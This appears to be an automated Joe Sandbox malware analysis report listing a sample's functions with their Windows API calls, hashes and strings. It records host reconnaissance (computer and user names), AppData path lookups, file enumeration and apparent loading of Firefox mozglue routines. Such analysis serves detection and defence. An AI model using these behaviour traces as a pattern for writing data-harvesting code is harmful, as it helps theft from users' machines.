Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1918cebb974407e34fc6fda42160d945d35feb49db62db560e6fe3029941a13
Instruction ID: 1cf78be1b61857718cccd923558bea349974784d47a10c059ed306062e1b8f43
Opcode Fuzzy Hash: b1918cebb974407e34fc6fda42160d945d35feb49db62db560e6fe3029941a13
Instruction Fuzzy Hash: 6341E674A00208EFCB44CF98C495BADBBB1FF48314F2482A9E8499F341D735AA81CF85

Function 00355050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 0035508A
lstrcat.KERNEL32(?,0136DF88), ref: 003550A8

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: be0c45d0a62aac5c063352a4e42231a21afbba9d3c1bb8a9a1c30020e1b0cdd1
Instruction ID: 79f454e3abf9394eaf694455635fd06d0d596b1364bf97aa3291ccf7c10da4d4
Opcode Fuzzy Hash: be0c45d0a62aac5c063352a4e42231a21afbba9d3c1bb8a9a1c30020e1b0cdd1
Instruction Fuzzy Hash: AB01D67690020867D755FBB0DC47EEE337CAB64301F004185BA4A6A091EE74AACDDBA2

Function 003410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003410B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003410F7

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
Instruction ID: 38812c7dca60289d99d36021b221bd454364c06f323ab752fa2003c314e82581
Opcode Fuzzy Hash: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
Instruction Fuzzy Hash: F2F0E271641208BBE7149BA4AC49FAAB7E8E705B15F301448F904E7280E571AE44DBA0

Function 00358D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 41b7c9db05337136c142f291636b1d230a4e2a554fa9d4d464c8c3b73daf1a0a
Instruction ID: 6acda851be66ab2c57c004639eb1993b6e604e9646718e8db20e8e5f6622d9eb
Opcode Fuzzy Hash: 41b7c9db05337136c142f291636b1d230a4e2a554fa9d4d464c8c3b73daf1a0a
Instruction Fuzzy Hash: 2AF0AC70C00208EBDB05EF94D545ADCBBB4EB10312F508299DC556B2E1DB755A59EF81

Function 00358DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4f6b45b3eb73348b50d8ed7ba010f007864b898076e6979cf73702efa27d78a
Instruction ID: bdab7edc5b4cc1710edc16ff1280a06d864f2891aa3272c75ce68fce63e3be80
Opcode Fuzzy Hash: c4f6b45b3eb73348b50d8ed7ba010f007864b898076e6979cf73702efa27d78a
Instruction Fuzzy Hash: 91E0123194034C6BDB51DB90CC96FAD777C9B44B01F004295BE0C5A1D0DE70AB898B91

Function 00341190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

ExitProcess.KERNEL32 ref: 003411C6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
Instruction ID: 9ea1172836815cee43c54cda6eb28ffdd35e4a04b16087319b7c52c3344b57fc
Opcode Fuzzy Hash: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
Instruction Fuzzy Hash: 00E012B591430153DE0173B1BC0BF2A339C5B24347F041425FE05EB122FE29F848966A

Function 00358E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: eb81c6733ec0f6584a3460ed6a567394ea1d5113595daa023462ca5118fd3960
Instruction ID: 89b182a478b3971f22da86a4305314a34977b0c633b70bd40d2710a6e1da9872
Opcode Fuzzy Hash: eb81c6733ec0f6584a3460ed6a567394ea1d5113595daa023462ca5118fd3960
Instruction Fuzzy Hash: C001FB30A04108EFDB05CF98C586BAC7BB5EF04309F288488DD056B360C7755E88DF95

Non-executed Functions

Function 6C655440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C655492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6554A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6554BE
__Init_thread_footer.LIBCMT ref: 6C6554DB

Part of subcall function 6C67AB3F: EnterCriticalSection.KERNEL32(6C6CE370,?,?,6C643527,6C6CF6CC,?,?,?,?,?,?,?,?,6C643284), ref: 6C67AB49
Part of subcall function 6C67AB3F: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C643527,6C6CF6CC,?,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67AB7C

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6554F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C655516
GetCurrentThreadId.KERNEL32 ref: 6C65556A
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C655577
moz_xmalloc.MOZGLUE(00000070), ref: 6C655585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C655590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6555E6
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C655606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C655616

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

GetCurrentThreadId.KERNEL32 ref: 6C65563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C655646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C65567C
free.MOZGLUE(?), ref: 6C6556AE

Part of subcall function 6C665E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C665EDB
Part of subcall function 6C665E90: memset.VCRUNTIME140(ewjl,000000E5,?), ref: 6C665F27
Part of subcall function 6C665E90: LeaveCriticalSection.KERNEL32(?), ref: 6C665FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6556E8
GetCurrentThreadId.KERNEL32 ref: 6C655707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C65570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C655729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C65574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C65576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C655796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6557B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6557CA

Strings

[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C655717
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C655B38
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C655BBE
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6554B9
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C655C56
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C655D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C65584E
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C655791
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6557C5
MOZ_PROFILER_STARTUP, xrefs: 6C6555E1
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C655AC9
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6554A3
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C655724
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C655D2B
GeckoMain, xrefs: 6C655554, 6C6555D5
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C655CF9
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C655D1C
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6556E3
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6557AE
MOZ_BASE_PROFILER_HELP, xrefs: 6C655511
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C65548D
[I %d/%d] profiler_init, xrefs: 6C65564E
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C655D01
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C655749
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C655766

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
